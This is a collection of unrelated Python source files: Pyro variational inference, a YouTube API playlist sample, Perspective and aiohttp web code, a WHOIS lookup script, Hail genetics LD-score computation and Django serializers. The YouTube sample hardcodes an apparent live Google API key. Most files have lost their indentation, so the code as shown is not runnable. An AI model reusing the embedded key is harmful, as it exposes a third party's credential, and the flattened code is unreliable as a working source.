if use_decaying_avg_baseline:
avg_downstream_cost_old = pyro.param("__baseline_avg_downstream_cost_" + node,
ng_zeros(1), tags="__tracegraph_elbo_internal_tag")
avg_downstream_cost_new = (1 - baseline_beta) * downstream_cost + \
baseline_beta * avg_downstream_cost_old
avg_downstream_cost_old.data = avg_downstream_cost_new.data # XXX copy_() ?
baseline += avg_downstream_cost_old
if use_nn_baseline:
# block nn_baseline_input gradients except in baseline loss
baseline += nn_baseline(detach_iterable(nn_baseline_input))
elif use_baseline_value:
# it's on the user to make sure baseline_value tape only points to baseline params
baseline += baseline_value
if use_nn_baseline or use_baseline_value:
# accumulate baseline loss
baseline_loss += torch.pow(downstream_cost.detach() - baseline, 2.0).sum()
guide_log_pdf = guide_site[log_pdf_key] / guide_site["scale"] # not scaled by subsampling
if use_nn_baseline or use_decaying_avg_baseline or use_baseline_value:
if downstream_cost.size() != baseline.size():
raise ValueError("Expected baseline at site {} to be {} instead got {}".format(
node, downstream_cost.size(), baseline.size()))
downstream_cost = downstream_cost - baseline
surrogate_elbo += (guide_log_pdf * downstream_cost.detach()).sum()
return surrogate_elbo, baseline_loss
class TraceGraph_ELBO(object):
"""
A TraceGraph implementation of ELBO-based SVI. The gradient estimator
is constructed along the lines of reference [1] specialized to the case
of the ELBO. It supports arbitrary dependency structure for the model
and guide as well as baselines for non-reparameterizable random variables.
Where possible, dependency information as recorded in the TraceGraph is
used to reduce the variance of the gradient estimator.
References
[1] `Gradient Estimation Using Stochastic Computation Graphs`,
John Schulman, Nicolas Heess, Theophane Weber, Pieter Abbeel
[2] `Neural Variational Inference and Learning in Belief Networks`,
Andriy Mnih, Karol Gregor
"""
def __init__(self, num_particles=1, enum_discrete=False):
"""
:param num_particles: the number of particles (samples) used to form the estimator
:param bool enum_discrete: whether to sum over discrete latent variables, rather than sample them
"""
super(TraceGraph_ELBO, self).__init__()
self.num_particles = num_particles
self.enum_discrete = enum_discrete
def _get_traces(self, model, guide, *args, **kwargs):
"""
runs the guide and runs the model against the guide with
the result packaged as a tracegraph generator
"""
for i in range(self.num_particles):
if self.enum_discrete:
raise NotImplementedError("https://github.com/uber/pyro/issues/220")
guide_trace = poutine.trace(guide,
graph_type="dense").get_trace(*args, **kwargs)
model_trace = poutine.trace(poutine.replay(model, guide_trace),
graph_type="dense").get_trace(*args, **kwargs)
check_model_guide_match(model_trace, guide_trace)
guide_trace = prune_subsample_sites(guide_trace)
model_trace = prune_subsample_sites(model_trace)
weight = 1.0 / self.num_particles
yield weight, model_trace, guide_trace
def loss(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Evaluates the ELBO with an estimator that uses num_particles many samples/particles.
"""
elbo = 0.0
for weight, model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
guide_trace.log_pdf(), model_trace.log_pdf()
elbo_particle = 0.0
for name in model_trace.nodes.keys():
if model_trace.nodes[name]["type"] == "sample":
if model_trace.nodes[name]["is_observed"]:
elbo_particle += model_trace.nodes[name]["log_pdf"]
else:
elbo_particle += model_trace.nodes[name]["log_pdf"]
elbo_particle -= guide_trace.nodes[name]["log_pdf"]
elbo += torch_data_sum(weight * elbo_particle)
loss = -elbo
if np.isnan(loss):
warnings.warn('Encountered NAN loss')
return loss
def loss_and_grads(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Computes the ELBO as well as the surrogate ELBO that is used to form the gradient estimator.
Performs backward on the latter. num_particles many samples are used to form the estimators.
If baselines are present, a baseline loss is also constructed and differentiated.
"""
loss = 0.0
for weight, model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
loss += self._loss_and_grads_particle(weight, model_trace, guide_trace)
return loss
def _loss_and_grads_particle(self, weight, model_trace, guide_trace):
# get info regarding rao-blackwellization of vectorized map_data
guide_vec_md_info = guide_trace.graph["vectorized_map_data_info"]
model_vec_md_info = model_trace.graph["vectorized_map_data_info"]
guide_vec_md_condition = guide_vec_md_info['rao-blackwellization-condition']
model_vec_md_condition = model_vec_md_info['rao-blackwellization-condition']
do_vec_rb = guide_vec_md_condition and model_vec_md_condition
if not do_vec_rb:
warnings.warn(
"Unable to do fully-vectorized Rao-Blackwellization in TraceGraph_ELBO. "
"Falling back to higher-variance gradient estimator. "
"Try to avoid these issues in your model and guide:\n{}".format("\n".join(
guide_vec_md_info["warnings"] | model_vec_md_info["warnings"])))
guide_vec_md_nodes = guide_vec_md_info['nodes'] if do_vec_rb else set()
model_vec_md_nodes = model_vec_md_info['nodes'] if do_vec_rb else set()
# have the trace compute all the individual (batch) log pdf terms
# so that they are available below
guide_trace.compute_batch_log_pdf(site_filter=lambda name, site: name in guide_vec_md_nodes)
guide_trace.log_pdf()
model_trace.compute_batch_log_pdf(site_filter=lambda name, site: name in model_vec_md_nodes)
model_trace.log_pdf()
# compute elbo for reparameterized nodes
non_reparam_nodes = set(guide_trace.nonreparam_stochastic_nodes)
elbo, surrogate_elbo = _compute_elbo_reparam(model_trace, guide_trace, non_reparam_nodes)
# the following computations are only necessary if we have non-reparameterizable nodes
baseline_loss = 0.0
if non_reparam_nodes:
downstream_costs = _compute_downstream_costs(
model_trace, guide_trace, model_vec_md_nodes, guide_vec_md_nodes, non_reparam_nodes)
surrogate_elbo_term, baseline_loss = _compute_elbo_non_reparam(
guide_trace, guide_vec_md_nodes, non_reparam_nodes, downstream_costs)
surrogate_elbo += surrogate_elbo_term
# collect parameters to train from model and guide
trainable_params = set(site["value"]
for trace in (model_trace, guide_trace)
for site in trace.nodes.values()
if site["type"] == "param")
if trainable_params:
surrogate_loss = -surrogate_elbo
torch_backward(weight * (surrogate_loss + baseline_loss))
pyro.get_param_store().mark_params_active(trainable_params)
loss = -elbo
if np.isnan(loss):
warnings.warn('Encountered NAN loss')
return weight * loss
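# A minimal usage sketch (comments only; the exact SVI wiring depends on the pyro
# version this file targets -- SVI is expected to call the `loss` / `loss_and_grads`
# methods defined above, and `model`, `guide` and their arguments are assumed to be
# defined elsewhere):
#
#     elbo = TraceGraph_ELBO(num_particles=4)
#     svi = pyro.infer.SVI(model, guide, optim=pyro.optim.Adam({"lr": 1e-3}), loss=elbo)
#     for step in range(1000):
#         svi.step(*model_args)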
|
__version__ = "20.02.3"
|
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 14 04:37:02 2017
@author: gurjot
"""
### START BOILERPLATE CODE
# Sample Python code for user authorization
#import httplib2
from apiclient.discovery import build
#from oauth2client.client import flow_from_clientsecrets
#from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret.
CLIENT_SECRETS_FILE = "client_secrets.json"
# This OAuth 2.0 access scope allows for full read/write access to the
# authenticated user's account and requires requests to use an SSL connection.
YOUTUBE_READ_WRITE_SSL_SCOPE = "https://www.googleapis.com/auth/youtube.force-ssl"
API_SERVICE_NAME = "youtube"
API_VERSION = "v3"
API_KEY = 'AIzaSyADmjxtSo8uKscHXuREUsZdTB-0xIzmpT8'
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = "WARNING: Please configure OAuth 2.0"
# Authorize the request and store authorization credentials.
def get_authenticated_service(args):
# flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE, scope=YOUTUBE_READ_WRITE_SSL_SCOPE,
# message=MISSING_CLIENT_SECRETS_MESSAGE)
# storage = Storage("youtube-api-snippets-oauth2.json")
# credentials = storage.get()
# if credentials is None or credentials.invalid:
# credentials = run_flow(flow, storage, args)
# Trusted testers can download this discovery document from the developers page
# and it should be in the same directory with the code.
return build(API_SERVICE_NAME, API_VERSION,developerKey=API_KEY)
# http=credentials.authorize(httplib2.Http()))
args = argparser.parse_args()
service = get_authenticated_service(args)
def print_results(results):
print(results)
# Build a resource based on a list of properties given as key-value pairs.
# Leave properties with empty values out of the inserted resource.
def build_resource(properties):
resource = {}
for p in properties:
# Given a key like "snippet.title", split into "snippet" and "title", where
# "snippet" will be an object and "title" will be a property in that object.
prop_array = p.split('.')
ref = resource
for pa in range(0, len(prop_array)):
is_array = False
key = prop_array[pa]
# Convert a name like "snippet.tags[]" to snippet.tags, but handle
# the value as an array.
if key[-2:] == '[]':
key = key[0:len(key)-2:]
is_array = True
if pa == (len(prop_array) - 1):
# Leave properties without values out of inserted resource.
if properties[p]:
if is_array:
ref[key] = properties[p].split(',')
else:
ref[key] = properties[p]
elif key not in ref:
# For example, the property is "snippet.title", but the resource does
# not yet have a "snippet" object. Create the snippet object here.
# Setting "ref = ref[key]" means that in the next time through the
# "for pa in range ..." loop, we will be setting a property in the
# resource's "snippet" object.
ref[key] = {}
ref = ref[key]
else:
# For example, the property is "snippet.description", and the resource
# already has a "snippet" object.
ref = ref[key]
return resource
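# For example (illustrative values only), build_resource({
#     'snippet.playlistId': 'PL123',
#     'snippet.resourceId.kind': 'youtube#video',
#     'snippet.tags[]': 'a,b'})
# returns:
#     {'snippet': {'playlistId': 'PL123',
#                  'resourceId': {'kind': 'youtube#video'},
#                  'tags': ['a', 'b']}}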
# Remove keyword arguments that are not set
def remove_empty_kwargs(**kwargs):
good_kwargs = {}
if kwargs is not None:
    for key, value in kwargs.items():
if value:
good_kwargs[key] = value
return good_kwargs
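# For example, remove_empty_kwargs(part='snippet', maxResults=None) returns {'part': 'snippet'}.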
### END BOILERPLATE CODE
# Sample python code for playlistItems.list
def playlist_items_list_by_playlist_id(service, **kwargs):
kwargs = remove_empty_kwargs(**kwargs) # See full sample for function
results = service.playlistItems().list(
**kwargs
).execute()
print_results(results)
playlist_items_list_by_playlist_id(service,
part='snippet,contentDetails',
maxResults=25,
playlistId='PL-2rrpXWmCSLuUE_5IPkihUE85SUrilyj')
|
################################################################################
#
# Copyright (c) 2019, the Perspective Authors.
#
# This file is part of the Perspective library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
import tornado
from random import random
from functools import partial
from .dispatch import async_queue, subscribe, unsubscribe
def view(
client,
table_name,
columns=None,
row_pivots=None,
column_pivots=None,
aggregates=None,
sort=None,
filter=None,
expressions=None,
):
"""Create a new View by posting a message to the Perspective server
implementation through `client`, returning a Future that will resolve to a
`PerspectiveViewProxy` object whose API must be called with `await` or
`yield`, or an Exception if the View creation failed.
"""
name = str(random())
config = {
"columns": columns,
"row_pivots": row_pivots,
"column_pivots": column_pivots,
"aggregates": aggregates,
"sort": sort,
"filter": filter,
"expressions": expressions,
}
msg = {
"cmd": "view",
"view_name": name,
"table_name": table_name,
"config": config,
}
future = tornado.concurrent.Future()
client.post(msg, future)
return future
class PerspectiveViewProxy(object):
def __init__(self, client, name):
"""A proxy for a Perspective `View` object elsewhere, i.e. on a remote
server accessible through a Websocket.
All public API methods on this proxy are async, and must be called
with `await` or a `yield`-based coroutine.
Args:
client (:obj:`PerspectiveClient`): A `PerspectiveClient` that is
set up to send messages to a Perspective server implementation
elsewhere.
name (:obj:`str`): a `str` name for the View. Automatically
generated if using the `view` function defined above.
"""
self._client = client
self._name = name
self._async_queue = partial(async_queue, self._client, self._name)
self._subscribe = partial(subscribe, self._client, self._name)
self._unsubscribe = partial(unsubscribe, self._client, self._name)
def get_config(self):
return self._async_queue("get_config", "view_method")
def sides(self):
return self._async_queue("sides", "view_method")
def num_rows(self):
return self._async_queue("num_rows", "view_method")
def num_columns(self):
return self._async_queue("num_columns", "view_method")
def get_min_max(self):
return self._async_queue("get_min_max", "view_method")
def get_row_expanded(self, idx):
return self._async_queue("get_row_expanded", "view_method", idx)
def expand(self, idx):
return self._async_queue("expand", "view_method", idx)
def collapse(self, idx):
return self._async_queue("collapse", "view_method", idx)
def set_depth(self, idx):
return self._async_queue("set_depth", "view_method", idx)
def column_paths(self):
return self._async_queue("column_paths", "view_method")
def schema(self, as_string=False):
return self._async_queue("schema", "view_method", as_string=as_string)
def expression_schema(self, as_string=False):
return self._async_queue(
"expression_schema", "view_method", as_string=as_string
)
def on_update(self, callback, mode=None):
return self._subscribe("on_update", "view_method", callback, mode=mode)
def remove_update(self, callback):
return self._unsubscribe("remove_update", "view_method", callback)
def on_delete(self, callback):
return self._subscribe("on_delete", "view_method", callback)
def remove_delete(self, callback):
return self._unsubscribe("remove_delete", "view_method", callback)
def delete(self):
return self._async_queue("delete", "view_method")
def to_arrow(self, **kwargs):
return self._async_queue("to_arrow", "view_method", **kwargs)
def to_records(self, **kwargs):
return self._async_queue("to_records", "view_method", **kwargs)
def to_dict(self, **kwargs):
return self._async_queue("to_dict", "view_method", **kwargs)
def to_numpy(self, **kwargs):
return self._async_queue("to_numpy", "view_method", **kwargs)
def to_df(self, **kwargs):
return self._async_queue("to_df", "view_method", **kwargs)
def to_csv(self, **kwargs):
return self._async_queue("to_csv", "view_method", **kwargs)
def to_json(self, **kwargs):
return self._async_queue("to_json", "view_method", **kwargs)
def to_columns(self, **kwargs):
return self._async_queue("to_columns", "view_method", **kwargs)
|
import unittest
from pathlib import Path
import volatile
from ..flit import FlitReader
from ..pep517 import get_backend
from ..setuptools import SetuptoolsReader
class Pep517Test(unittest.TestCase):
def test_no_backend(self) -> None:
with volatile.dir() as d:
dp = Path(d)
requires, inst = get_backend(dp)
# self.assertEqual(["setuptools"], requires)
self.assertIsInstance(inst, SetuptoolsReader)
def test_setuptools_backend(self) -> None:
with volatile.dir() as d:
dp = Path(d)
Path(d, "pyproject.toml").write_text("")
requires, inst = get_backend(dp)
# self.assertEqual(["setuptools"], requires)
self.assertIsInstance(inst, SetuptoolsReader)
def test_flit_backend(self) -> None:
with volatile.dir() as d:
dp = Path(d)
Path(d, "pyproject.toml").write_text(
"""\
[build-system]
requires = ["flit_core >=2,<4"]
build-backend = "flit_core.buildapi"
"""
)
requires, inst = get_backend(dp)
self.assertEqual(["flit_core >=2,<4"], requires)
self.assertIsInstance(inst, FlitReader)
|
"""Web frontend functions for stand-alone running."""
import typing
import aiohttp.web
from cryptography.fernet import InvalidToken
from swift_browser_ui.ui.settings import setd
from swift_browser_ui.ui._convenience import session_check
async def browse(request: aiohttp.web.Request) -> aiohttp.web.FileResponse:
"""Serve the browser SPA when running without a proxy."""
session_check(request)
response = aiohttp.web.FileResponse(
str(setd["static_directory"]) + "/browse.html",
headers={
"Cache-Control": "no-cache, no-store, must-revalidate",
"Pragma": "no-cache",
"Expires": "0",
},
)
return response
async def index(
request: typing.Optional[aiohttp.web.Request],
) -> typing.Union[aiohttp.web.Response, aiohttp.web.FileResponse]:
"""Serve the index page when running without a proxy."""
try:
if request is not None:
session_check(request)
request.app["Log"].info("Redirecting an existing session to app")
return aiohttp.web.Response(
status=303,
headers={
"Location": "/browse",
},
)
else:
raise AttributeError
except (AttributeError, InvalidToken, KeyError, aiohttp.web.HTTPUnauthorized):
return aiohttp.web.FileResponse(str(setd["static_directory"]) + "/index.html")
async def loginpassword(
request: typing.Optional[aiohttp.web.Request],
) -> typing.Union[aiohttp.web.Response, aiohttp.web.FileResponse]:
"""Serve the username and password login page."""
try:
if request is not None:
session_check(request)
request.app["Log"].info("Redirecting an existing session to app")
return aiohttp.web.Response(
status=303,
headers={
"Location": "/browse",
},
)
else:
raise AttributeError
except (AttributeError, InvalidToken, KeyError, aiohttp.web.HTTPUnauthorized):
return aiohttp.web.FileResponse(
str(setd["static_directory"]) + "/loginpassword.html"
)
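# A minimal wiring sketch (comments only; the real application registers its routes
# elsewhere -- the paths below are illustrative):
#
#     app = aiohttp.web.Application()
#     app.router.add_get("/", index)
#     app.router.add_get("/browse", browse)
#     app.router.add_get("/loginpassword", loginpassword)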
|
#!/usr/bin/python
##################################################
## Author: Joshua Franklin
## whoarethey.py
## Example input to start:
## sudo ./whoarethey.py -f someFileName
## The file should be an electionBuster results file
## This code relies on a library from Google: https://code.google.com/p/pywhois/
##################################################
import sys
import string
import argparse
import whois
# Function: casts and removes those pesky \r and \n
def stringAndStrip(input):
input = str(input)
input = input.rstrip()
return input
#Parse command line arguments
parser = argparse.ArgumentParser(description='Pulls down whois information by parsing an electionBuster.py results file')
parser.add_argument('-f','--fileName', help='Name of electionBuster results file', required=True)
args = parser.parse_args()
# Stores command line arguments
# Make all lowercase
fileName = args.fileName
#open inputFile
with open(fileName, 'r') as inputFile:
lines = list(inputFile)
#open and clear output file
tempResults = 'WHOIS-' + str(fileName)
resultsFile = open(tempResults, "w")
# This clears the results files before reopening them
resultsFile.close()
resultsFile = open(tempResults, "w")
# Instantiating some variables
totalLines = 0
index = 0
positiveResultsLine = 0
numberOfHits = 0
URLlist = []
'''
#grabbing total number of lines the file
for line in lines:
print lines + '\n'
totalLines = totalLines + 1
#finding the line right before the results appear in the file
for line in lines:
if line[0:13] == 'Total runtime':
positiveResultsLine = index
else:
index = index + 1
'''
# setting up some more variables
numberOfHits = stringAndStrip(numberOfHits)
numberOfHits = int(numberOfHits)
positiveResultsLine = positiveResultsLine + 1
hitString = lines[positiveResultsLine]
hitCount = 0
newList = []
'''
#increment where we found the results to where URL begin
positiveResultsLine = positiveResultsLine + 5
#parse the hitstring for the number of hits
numberOfHits = hitString[11:13]
index = 0
# parse out the URLs - ridiculously difficult
for line in lines:
index = index + 1
if index == positiveResultsLine:
hitCount = int(numberOfHits)
URLlist.append(line)
hitCount = int(hitCount) - 1
positiveResultsLine = positiveResultsLine + 1
numberOfHits = int(numberOfHits) - 1
if hitCount <= 0:
break
# having some issues with spaces and a dashed line from results file
# basically removing the spaces and dashes, and skipping the first line b/c that's a dash I couldn't get away from
flag = 0
for url in URLlist:
if flag != 0:
url = stringAndStrip(url)
if url != ' ' or '-------------------------------------':
newList.append(url)
flag = flag + 1
'''
#setup to write to file
resultsFile.write('electionBuster WHOIS results' + "\n")
resultsFile.write('whoAreThey v2' + "\n")
resultsFile.write('###############################' + "\n")
resultsFile.write("\n")
#final processing, lookup, and writing to logfile
for line in lines:
url = stringAndStrip(line)
print url + "\n"
resultsFile.write('-------------------------------------')
resultsFile.write("\n")
resultsFile.write(str(url) + "\n")
w = whois.whois(url)
resultsFile.write(str(w) + "\n")
print w
print "\n"
resultsFile.write('-------------------------------------')
resultsFile.write("\n")
# Bad things happen if these files are not properly closed
resultsFile.close()
|
class Solution:
def isIsomorphic(self, s: str, t: str) -> bool:
hashmap = {}
hashset = set()
for i in range(len(s)):
if s[i] not in hashmap:
if t[i] in hashset:
return False
elif hashmap[s[i]] != t[i]:
return False
hashmap[s[i]] = t[i]
hashset.add(t[i])
        return True
|
#!/usr/bin/env python3
# coding: utf-8
__author__ = 'mkanai'
import argparse
import atexit
import numpy as np
import hail as hl
import uuid
from hail.linalg import BlockMatrix
from hail.utils import new_temp_file, hadoop_open, timestamp_path
from ukbb_pan_ancestry.resources import get_filtered_mt, get_variant_results_qc_path, POPS, temp_bucket
from ukbb_pan_ancestry.resources.ld import *
def new_gs_temp_path():
return f'{temp_bucket}/{str(uuid.uuid4())}'
def checkpoint_tmp(hail_obj, path=None, overwrite=False, force_row_major=False):
if path is None:
path = new_gs_temp_path()
if isinstance(hail_obj, BlockMatrix):
return hail_obj.checkpoint(path, overwrite=overwrite, force_row_major=force_row_major)
else:
return hail_obj.checkpoint(path, overwrite=overwrite)
def normalize_bm(bm):
n = bm.shape[1]
m1 = checkpoint_tmp(bm.sum(axis=1))
m2 = checkpoint_tmp((bm**2).sum(axis=1))
mean = m1 / n
# biased is n; unbiased is n - 1
stdev = ((m2 - m1**2 / n) / n).sqrt()
    # add a tiny constant (~float32 min normal, 1.18e-38) to prevent zero division due to machine precision
bm_norm = ((bm - mean) / (stdev + 1.18e-38))
return bm_norm
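# Reading of normalize_bm above: each row of bm (one variant across the n samples) is
# standardized as z = (x - mean(x)) / (std(x) + eps), using the population
# (divide-by-n) standard deviation -- the usual scaling before forming an LD matrix.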
# cf. https://github.com/Nealelab/UK_Biobank_GWAS/blob/master/0.2/create_ldsc_hm3_table.py
def write_ldsc_hm3_snplist(info_threshold=0.9, maf_threshold=0.01, overwrite=False):
# Filter variants
ht = hl.read_table(get_variant_results_qc_path())
# in autosomes
ht = ht.filter(ht.locus.in_autosome())
# no MHC
ht = ht.filter(~hl.parse_locus_interval('6:28477797-33448354').contains(ht.locus))
# info > 0.9
ht = ht.filter(ht.info > info_threshold)
# SNP only
ht = ht.filter(hl.is_snp(ht.alleles[0], ht.alleles[1]))
# no multi-allelic sites
loc_count = ht.group_by(ht.locus).aggregate(nloc=hl.agg.count())
loc_count = loc_count.filter(loc_count.nloc > 1)
multi_sites = loc_count.aggregate(hl.agg.collect_as_set(loc_count.locus), _localize=False)
ht = ht.filter(~multi_sites.contains(ht.locus))
# in HM3
hm3_snps = hl.read_table('gs://ukbb-ldsc-dev/ukb_hm3_snplist/hm3.r3.b37.auto_bi_af.ht')
hm3_snps = hm3_snps.select()
ht = ht.join(hm3_snps, 'right')
# no strand ambiguity
ht = ht.filter(~hl.is_strand_ambiguous(ht.alleles[0], ht.alleles[1]))
ht = checkpoint_tmp(ht)
def get_maf(af):
return 0.5 - hl.abs(0.5 - af)
# MAF > 1% in UKB & gnomad genome/exome (if defined) for each population
for pop in POPS:
snplist = ht.filter(
hl.rbind(
ht.freq[ht.freq.index(lambda x: x.pop == pop)], lambda y: (get_maf(y.af) > maf_threshold) &
(hl.is_missing(y.gnomad_genomes_af) | (get_maf(y.gnomad_genomes_af) > maf_threshold)) &
(hl.is_missing(y.gnomad_exomes_af) | (get_maf(y.gnomad_exomes_af) > maf_threshold))))
snplist = snplist.select('rsid')
snplist.write(get_hm3_snplist_path(pop), overwrite=overwrite)
# cf: https://github.com/broadinstitute/gnomad_qc/blob/master/gnomad_qc/v2/annotations/generate_ld_data.py
def compute_ldscore(ht, bm_ld, n, radius, out_name, overwrite):
r2 = bm_ld**2
r2_adj = ((n - 1.0) / (n - 2.0)) * r2 - (1.0 / (n - 2.0))
# This is required, as the squaring/multiplication densifies, so this re-sparsifies.
starts_and_stops = hl.linalg.utils.locus_windows(ht.locus, radius, _localize=False)
r2_adj = r2_adj._sparsify_row_intervals_expr(starts_and_stops, blocks_only=False)
r2_adj = r2_adj.sparsify_triangle()
r2_adj = checkpoint_tmp(r2_adj)
# Note that the original ld matrix is triangular
l2row = checkpoint_tmp(r2_adj.sum(axis=0)).T
l2col = checkpoint_tmp(r2_adj.sum(axis=1))
r2_diag = checkpoint_tmp(r2_adj.diagonal()).T
l2 = l2row + l2col - r2_diag
l2_bm_tmp = new_temp_file()
l2_tsv_tmp = new_gs_temp_path()
l2.write(l2_bm_tmp, force_row_major=True)
BlockMatrix.export(l2_bm_tmp, l2_tsv_tmp)
ht_scores = hl.import_table(l2_tsv_tmp, no_header=True, impute=True)
ht_scores = ht_scores.add_index().rename({'f0': 'ld_score'})
ht_scores = ht_scores.key_by('idx')
ht = ht.add_index()
ht = ht.annotate(**ht_scores[ht.idx]).drop('idx')
ht = ht.checkpoint(out_name, overwrite)
return ht
def export_ldscore(ht, pop):
hm3_snps = hl.read_table(get_hm3_snplist_path(pop))
ht = ht.select(CHR=ht.locus.contig,
SNP=hl.variant_str(ht.locus, ht.alleles),
RSID=ht.rsid,
BP=ht.locus.position,
L2=ht.ld_score,
MAF=0.5 - hl.abs(0.5 - ht.AF))
count = ht.aggregate(hl.struct(M=hl.agg.count(), M_5_50=hl.agg.sum(ht.MAF > 0.05)))
ht = ht.filter(hl.is_defined(hm3_snps[ht.locus, ht.alleles]))
ht = ht.key_by().drop('locus', 'alleles', 'MAF')
with hadoop_open(get_ld_score_flat_file_path(pop, extension='M'), 'w') as f:
f.write(f'{count.M}\n')
with hadoop_open(get_ld_score_flat_file_path(pop, extension='M_5_50'), 'w') as f:
f.write(f'{count.M_5_50}\n')
# LD score with variant ids
ht.drop('RSID').export(get_ld_score_flat_file_path(pop))
# with rsids
ht.transmute(SNP=ht.RSID).export(get_ld_score_flat_file_path(pop, rsid=True))
def main(args):
pop = args.pop
num_pcs = 10
basic_covars = ['sex', 'age', 'age2', 'age_sex', 'age2_sex']
covariates = basic_covars + [f'PC{x}' for x in range(1, num_pcs + 1)]
tmp_mt_path = f'{temp_bucket}/{pop}.mt'
tmp_bm_path = f'{temp_bucket}/{pop}.bm'
if args.write_mt:
mt = get_filtered_mt(chrom='all', pop=pop, entry_fields=['dosage'], filter_mac_instead_of_ac=True)
mt = mt.annotate_rows(AF=hl.agg.mean(mt.dosage) / 2)
mt = mt.checkpoint(tmp_mt_path, overwrite=args.overwrite)
n = mt.count()[1]
# write variant indexes
ht = mt.rows().select().add_index()
ht = ht.annotate_globals(n_samples=n, pop=pop)
ht.write(get_ld_variant_index_path(pop), overwrite=args.overwrite)
else:
mt = hl.read_matrix_table(tmp_mt_path)
n = mt.count()[1]
if args.write_bm:
# convert mt to bm
BlockMatrix.write_from_entry_expr(mt.dosage,
tmp_bm_path,
mean_impute=True,
center=False,
normalize=False,
overwrite=args.overwrite)
else:
bm = BlockMatrix.read(tmp_bm_path)
if args.compute_ld_matrix:
print(f'BlockMatrix shape: {bm.shape}')
# mean-center and normalize bm
bm_norm = normalize_bm(bm)
bm_norm = checkpoint_tmp(bm_norm)
# take covariates (with intercept), make hat bms for FWL projection
cov = mt.cols().select(*covariates).to_pandas().drop(['s'], axis=1)
cov['Intercept'] = 1.0
hat1 = cov.values
hat2 = np.dot(np.linalg.inv(np.dot(cov.transpose(), cov)), cov.transpose())
bm_hat1 = checkpoint_tmp(BlockMatrix.from_numpy(hat1))
bm_hat2 = checkpoint_tmp(BlockMatrix.from_numpy(hat2))
        # Covariate adjustment; done in three steps due to the huge matrix operation
bm_Z = checkpoint_tmp(bm_norm @ bm_hat1)
bm_Z = checkpoint_tmp(bm_Z @ bm_hat2)
bm_Z = checkpoint_tmp(bm_norm - bm_Z)
# compute ld matrix with a specified radius
bm_ldadj = (bm_Z @ bm_Z.T) / n
starts_and_stops = hl.linalg.utils.locus_windows(mt.locus, radius=args.radius, _localize=False)
bm_ldadj = bm_ldadj._sparsify_row_intervals_expr(starts_and_stops, blocks_only=False)
        # sparsify to a triangle matrix
bm_ldadj = bm_ldadj.sparsify_triangle()
bm_ldadj = bm_ldadj.checkpoint(get_ld_matrix_path(pop), overwrite=args.overwrite, force_row_major=True)
else:
bm_ldadj = BlockMatrix.read(get_ld_matrix_path(pop))
if args.write_ldsc_hm3_snplist:
# Note: currently, this writes snplists for all the populations at once
write_ldsc_hm3_snplist(overwrite=args.overwrite)
if args.compute_ldscore:
        ht_ldscore = compute_ldscore(mt.rows(),
bm_ldadj,
n,
radius=args.ld_score_radius,
out_name=get_ld_score_ht_path(pop),
overwrite=args.overwrite)
export_ldscore(ht_ldscore, pop)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--pop', type=str, required=True, help='Population to compute a LD matrix')
parser.add_argument('--radius', type=int, default=1e7, help='Radius of window for LD matrix')
parser.add_argument('--ld-score-radius', type=int, default=1e6, help='Radius of window for LD score')
parser.add_argument('--write-mt', action='store_true', help='Write MatrixTable from bgen')
parser.add_argument('--write-bm', action='store_true', help='Write BlockMatrix from MatrixTable')
parser.add_argument('--compute-ld-matrix', action='store_true', help='Compute LD matrix')
parser.add_argument('--compute-ldscore', action='store_true', help='Compute LD score')
parser.add_argument('--write-ldsc-hm3-snplist', action='store_true', help='Write QCed HM3 snplist for ldsc')
parser.add_argument('--overwrite', action='store_true', help='Overwrite data')
args = parser.parse_args()
atexit.register(lambda: hl.copy_log(timestamp_path(f'gs://ukb-diverse-pops/ld/{args.pop}/ld', suffix='.log')))
main(args)
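# Example invocation (a sketch; the script name and population code are illustrative,
# and each stage can be run separately via its flag):
#
#     python generate_ld_matrix.py --pop EUR --write-mt --write-bm \
#         --compute-ld-matrix --compute-ldscore --write-ldsc-hm3-snplist --overwrite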
|
from rest_framework import serializers
from rest_framework.reverse import reverse
from unifier.apps.core.models import Manga, Novel, Platform
class MangaPlatformSerializer(serializers.ModelSerializer):
class Meta:
model = Manga
fields = ["id", "title", "year", "chapters_count"]
class NovelPlatformSerializer(serializers.ModelSerializer):
class Meta:
model = Novel
fields = ["id", "title", "year", "chapters_count"]
class PlatformSerializer(serializers.ModelSerializer):
mangas = MangaPlatformSerializer(read_only=True, many=True)
novels = NovelPlatformSerializer(read_only=True, many=True)
platform_url = serializers.SerializerMethodField()
class Meta:
model = Platform
fields = [
"url",
"name",
"url_search",
"mangas",
"novels",
"platform_url",
]
def get_platform_url(self, obj):
return reverse("platform-detail", args=[obj.id])
class PlatformSerializerDetail(serializers.ModelSerializer):
mangas = MangaPlatformSerializer(read_only=True, many=True)
novels = NovelPlatformSerializer(read_only=True, many=True)
class Meta:
model = Platform
fields = PlatformSerializer.Meta.fields[:-1]
|
from abc import abstractmethod, ABCMeta
import numpy as np
from palmnet.layers.multi_conv2D import MultiConv2D
from palmnet.layers.multi_dense import MultiDense
from skluc.utils import logger
from tensorly.decomposition import matrix_product_state
from palmnet.core.layer_replacer import LayerReplacer
from palmnet.data import Cifar100
from palmnet.layers.tt_layer_conv import TTLayerConv
from palmnet.layers.tt_layer_dense import TTLayerDense
from collections import defaultdict
# from keras.layers import Dense, Conv2D
from palmnet.utils import build_dct_tt_ranks, get_facto_for_channel_and_order, DCT_CHANNEL_PREDEFINED_FACTORIZATIONS, TensortrainBadRankException
from tensorflow_model_optimization.sparsity import keras as sparsity
class LayerReplacerMulti(LayerReplacer):
def __init__(self, nb_factors, final_sparsity=0, end_step=None, frequency=100, init_sparsity=0.5, begin_step=0, *args, **kwargs):
self.nb_factors = nb_factors
self.final_sparsity = final_sparsity
if self.final_sparsity != 0:
self.pruning_params = {
'pruning_schedule': sparsity.PolynomialDecay(initial_sparsity=init_sparsity,
final_sparsity=final_sparsity,
begin_step=begin_step,
end_step=end_step,
frequency=frequency)
